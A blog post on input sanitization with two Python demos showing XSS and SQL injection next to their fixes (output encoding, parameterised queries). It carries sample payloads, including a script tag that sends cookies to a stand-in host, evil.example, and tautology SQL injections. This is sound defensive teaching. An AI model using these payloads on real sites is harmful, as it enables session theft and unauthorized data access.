Thursday, May 3, 2018

Clean your shoes before entering the house.

Data sanitization is a simple yet effective tool for preventing attacks. What kind of attacks, you may ask? Many, but they can all be summarised as code injection: untrusted input that ends up being interpreted as code (SQL, HTML, JavaScript) instead of being treated as data.

In web applications you will run into forms, any form, that let you type an arbitrary string and then do something with it: display it as a comment, save it in the database, send it as a message, and so on. But suppose that instead of plain text I write a piece of code. If the input isn't sanitized, the page will run that code, and the results can be disastrous. Let the people at Computerphile explain it better:
There are quite a few kinds of code injection, but here are the most common ones:

SQL injection: As the name indicates, it targets SQL databases. When unsanitized input is concatenated into a query, adding SQL fragments to that input can make the database run the attacker's query and return data that the user should not be able to read (or modify or delete it). More info.

JavaScript and HTML injection (cross-site scripting, XSS): Adding JavaScript and HTML to unsanitized input that is later rendered into a page makes the browser run it and makes the page behave in unwanted ways. Because the injected content is served to whoever views that page, this can affect other users as well. More info.
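As an added example (not code from the original post), here is a small Python script that renders a user comment three ways: straight concatenation, concatenation after banning `<` and `>`, and proper output encoding with the standard `html.escape`. The comment text and author name are constructed attacker inputs; the attribute-context case goes one step beyond the paragraph above to show why banning only angle brackets is not enough.

```python
import html

# Constructed attacker inputs (not real data): a comment that tries to leak
# cookies, and a "name" that tries to break out of an HTML attribute.
ATTACKER_COMMENT = '<script>new Image().src="https://evil.example/?c="+document.cookie</script>'
ATTACKER_NAME = '" onmouseover="alert(1)'


def render_comment_vulnerable(name: str, comment: str) -> str:
    """Drops the user's text straight into the markup. The browser cannot tell
    the attacker's <script> apart from the page's own HTML, so it runs it."""
    return f'<p class="comment" data-author="{name}">{comment}</p>'


def strip_angle_brackets(value: str) -> str:
    """The character-ban approach: with < and > gone, no new tag can be opened."""
    return value.replace("<", "").replace(">", "")


def render_comment_blacklist(name: str, comment: str) -> str:
    """Same template, but every input goes through the blacklist first. This stops
    the <script> tag, yet the name still closes the data-author attribute with a
    double quote and adds an event handler, so JavaScript still runs on hover."""
    return (f'<p class="comment" data-author="{strip_angle_brackets(name)}">'
            f'{strip_angle_brackets(comment)}</p>')


def render_comment_safe(name: str, comment: str) -> str:
    """Output encoding: html.escape turns &, <, >, " and ' into entities, so the
    browser shows the attacker's text literally, in the element body and in the
    attribute alike. This is the fix, and it needs no character bans at all."""
    return f'<p class="comment" data-author="{html.escape(name)}">{html.escape(comment)}</p>'


def contains_live_script(rendered: str) -> bool:
    """Rough check used below: does the markup still contain an executable
    <script> tag or an event-handler attribute with a real quote around it?"""
    return "<script" in rendered or ' onmouseover="' in rendered


if __name__ == "__main__":
    for renderer in (render_comment_vulnerable, render_comment_blacklist, render_comment_safe):
        out = renderer(ATTACKER_NAME, ATTACKER_COMMENT)
        print(f"{renderer.__name__:27s} live script: {contains_live_script(out)}")
        print("   ", out)
```

Run it with `python3` and compare the three lines: only the escaped version has no executable script left. The point is that the fix lives where the data is written into HTML (output encoding), not in what characters the form accepts.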

A simple first line of defence is input sanitization: clean your inputs so that malicious code can't be written into them. One way is to reject certain characters or sets of characters, for example the single quote or the <> brackets. Be aware that such a blacklist is easy to get around (an injection into a numeric SQL field needs no quotes at all, and an injection into an HTML attribute needs no angle brackets), so treat it as a complement to the real fixes: parameterised queries for SQL and output encoding for HTML. The people at eSecurity Planet wrote a very in-depth article on how to protect your web applications using input sanitization; there are many things you can do. Since HTML5, a type attribute (email, tel, number, and so on) can be added to any input tag, which is a small step toward making sure the incoming data has the expected form. Note that this check runs in the browser and is skipped by anyone who sends the request by hand, so the server must validate the data again.
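As an added example (not code from the original post), the following Python script uses the standard `sqlite3` module to show both the SQL injection described earlier and the limits of the character-ban approach from the paragraph above. The users table, the credentials and the attacker inputs are constructed for the demonstration; the same pattern applies to any SQL database driver that supports bound parameters.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data (not from the post): an in-memory users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("alice", "wonderland", "admin"), ("bob", "builder", "user")],
    )
    return conn


def login_vulnerable(conn, username: str, password: str) -> list:
    """The form fields are glued into the SQL text, so a quote in the input ends
    the string literal and the rest of the input becomes part of the query."""
    sql = (f"SELECT username FROM users "
           f"WHERE username = '{username}' AND password = '{password}' ORDER BY id")
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username: str, password: str) -> list:
    """Parameterised query: the values travel separately from the SQL text and the
    driver binds them, so quotes in the input are just characters, never syntax."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (username, password))]


def strip_single_quotes(value: str) -> str:
    """The character ban suggested above: remove every single quote."""
    return value.replace("'", "")


def user_by_id_blacklist(conn, user_id: str) -> list:
    """Bans the quote and then concatenates. A numeric comparison needs no quotes,
    so `2 OR 1=1` passes the ban untouched and still rewrites the WHERE clause."""
    sql = f"SELECT username FROM users WHERE id = {strip_single_quotes(user_id)} ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def is_valid_id(value: str) -> bool:
    """Allow-list validation: an id is a string of decimal digits, nothing else."""
    return value.isdigit()


def user_by_id_safe(conn, user_id: str) -> list:
    """Validate against the allow-list, then bind the value as a parameter."""
    if not is_valid_id(user_id):
        raise ValueError("id must be a positive integer")
    sql = "SELECT username FROM users WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (int(user_id),))]


if __name__ == "__main__":
    conn = make_db()
    payload = "' OR '1'='1"
    print("vulnerable login:", login_vulnerable(conn, "nobody", payload))  # ['alice', 'bob']
    print("safe login:      ", login_safe(conn, "nobody", payload))        # []
    print("blacklist id:    ", user_by_id_blacklist(conn, "2 OR 1=1"))     # ['alice', 'bob']
    print("safe id:         ", user_by_id_safe(conn, "2"))                 # ['bob']
```

The vulnerable login returns every account for a password of `' OR '1'='1` because the quote closes the string and the rest is parsed as SQL; the same input against the parameterised query matches nothing. The quote-stripping version shows why a character ban is not a fix on its own: the numeric lookup is rewritten by `2 OR 1=1` without a single quote in sight, while an allow-list check plus a bound parameter rejects it outright.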

But as teacher Ken always says, never roll your own security: it is best to use good, well-maintained libraries that you trust to add input validation and sanitization to your page. For example, if you are using PHP you can validate and filter inputs using GUMP. There are many good tools out there; just make sure you fully trust the library in question, and don't add things you don't understand to your code just like that.
